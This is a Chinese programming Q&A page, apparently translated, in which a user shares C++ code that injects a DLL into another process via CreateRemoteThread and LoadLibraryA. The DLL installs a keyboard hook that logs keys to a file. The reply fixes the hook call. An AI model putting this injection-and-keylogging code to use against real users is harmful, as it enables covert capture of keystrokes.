如何调用注入的DLL里面的函数

Question

我想从另一个进程使用注入的DLL获取键盘消息，但我不知道在哪里必须在我自己的程序中调用函数。 这里是我注入DLL函数：

//this is my dll main function 
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved) 
     { 
     /* open file */ 
     FILE *file; 
     fopen_s(&file, "d:\\dll\\temp.txt", "a+"); 

     switch (ul_reason_for_call) { 
     case DLL_PROCESS_ATTACH: 
      hInst = (HINSTANCE)hModule; 
// should be function calling be here???? 
      installhook(); 
      break; 
     case DLL_PROCESS_DETACH: 
      fprintf(file, "DLL detach function called.\n"); 
      break; 
     case DLL_THREAD_ATTACH: 
      fprintf(file, "DLL thread attach function called.\n"); 
      break; 
     case DLL_THREAD_DETACH: 
      fprintf(file, "DLL thread detach function called.\n"); 
      break; 
     } 
     hInst = (HINSTANCE)hModule; 
     /* close file */ 
     fclose(file); 
     return TRUE; 
    } 

这里是我安装钩子函数安装keyboardproc处理

BOOL __declspec(dllexport)__stdcall installhook() 
     { 
      HWND targetWnd; 
      HANDLE hProcess; 
      unsigned long processID = 0; 
      hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)KeyboardProc, hInst, GetCurrentThreadId()); 
      return TRUE; 
     } 

，这是我keyboardproc函数体

LRESULT __declspec(dllexport)__stdcall CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) 
{ 
    char ch; 
    MessageBoxA(nullptr, "key touched\n", "DLL_PROCESS_ATTACH", MB_OK | MB_ICONWARNING); 
    do 
    { 
     if (((DWORD)lParam & 0x40000000) && (HC_ACTION == nCode)) 
     { 
      if ((wParam == VK_SPACE) || (wParam == VK_RETURN) || (wParam >= 0x2f) && (wParam <= 0x100)) 
      { 
       FILE *file; 
       fopen_s(&file, "d:\\dll\\temp.txt", "a+"); 
       fprintf(file, nCode + ".\n"); 
      } 
     } 
    } while (0); 
    return CallNextHookEx(hkb, nCode, wParam, lParam); 
} 

，并终于在这里是我的主要程序，我将dll注入目标进程

int procID = 9448; 
    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procID); 
    if (process == NULL) { 
     printf("Error: the specified process couldn't be found.\n"); 
    } 

    /* 
    * Get address of the LoadLibrary function. 
    */ 
    LPVOID addr = (LPVOID)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"); 
    if (addr == NULL) { 
     printf("Error: the LoadLibraryA function was not found inside kernel32.dll library.\n"); 
    } 

    /* 
    * Allocate new memory region inside the process's address space. 
    */ 
    LPVOID arg = (LPVOID)VirtualAllocEx(process, NULL, strlen(buffer), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 
    if (arg == NULL) { 
     printf("Error: the memory could not be allocated inside the chosen process.\n"); 
    } 

    /* 
    * Write the argument to LoadLibraryA to the process's newly allocated memory region. 
    */ 
    int n = WriteProcessMemory(process, arg, buffer, strlen(buffer), NULL); 
    if (n == 0) { 
     printf("Error: there was no bytes written to the process's address space.\n"); 
    } 

    cout << procID << "\nhandle:" << process << "\nAddress:" << addr << "\nVirtualArg:" << arg << "\nWM:"<<n<<"\n"; 


    /* 
    * Inject our DLL into the process's address space. 
    */ 
    HANDLE threadID = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)addr, arg, NULL, NULL); 
    if (threadID == NULL) { 
     printf("Error: the remote thread could not be created.\n"); 
    } 
    else { 
     printf("Success: the remote thread was successfully created.\n"); 
    } 

    /* 
    * Close the handle to the process, becuase we've already injected the DLL. 
    */ 
    CloseHandle(process); 

我的代码中出现了什么问题，以及必须更改才能获得所需结果！

Answer 1

是的，它可以从DLL_PROCESS_ATTACH中调用。 但根据msdn

HMOD [IN]类型：HINSTANCE句柄包含挂钩 程序由lpfn参数指向的DLL。 如果dwThreadId参数指定当前进程由 创建的线程，并且钩子过程位于与当前进程关联的代码 中，则hMod参数必须为 。

因此改变hMod是NULL

hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)KeyboardProc, NULL, GetCurrentThreadId());